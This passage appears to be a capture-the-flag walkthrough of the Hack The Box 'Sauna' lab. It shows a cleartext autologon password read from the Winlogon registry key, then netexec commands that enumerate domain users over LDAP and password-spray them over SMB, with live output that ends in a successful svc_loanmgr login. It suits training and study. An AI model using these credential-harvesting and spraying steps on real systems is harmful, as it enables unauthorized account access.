VMApplet : SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled : 0
scremoveoption : 0
DisableCAD : 1
LastLogOffEndTimePerfCounter : 2358450679
ShutdownFlags : 2147484203
DisableLockWorkstation : 0
DefaultPassword : Moneymakestheworldgoround!
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion
PSChildName : Winlogon
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registrythen list the users using fsmith and password spray
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc ldap 10.129.95.180 -u fsmith -p Thestrokes23 --users-export users.txt
LDAP 10.129.95.180 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.95.180 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
LDAP 10.129.95.180 389 SAUNA [*] Enumerated 6 domain users: EGOTISTICAL-BANK.LOCAL
LDAP 10.129.95.180 389 SAUNA -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.95.180 389 SAUNA Administrator 2021-07-26 09:16:16 0 Built-in account for administering the computer/domain
LDAP 10.129.95.180 389 SAUNA Guest < never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.95.180 389 SAUNA krbtgt 2020-01-22 21:45:30 0 Key Distribution Center Service Account
LDAP 10.129.95.180 389 SAUNA HSmith 2020-01-22 21:54:34 40
LDAP 10.129.95.180 389 SAUNA FSmith 2020-01-23 08:45:19 0
LDAP 10.129.95.180 389 SAUNA svc_loanmgr 2020-01-24 15:48:31 0
LDAP 10.129.95.180 389 SAUNA [*] Writing 6 local users to users.txt
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u users.txt -p 'Moneymakestheworldgoround!'
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\Administrator:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\Guest:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\krbtgt:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\HSmith:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\FSmith:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!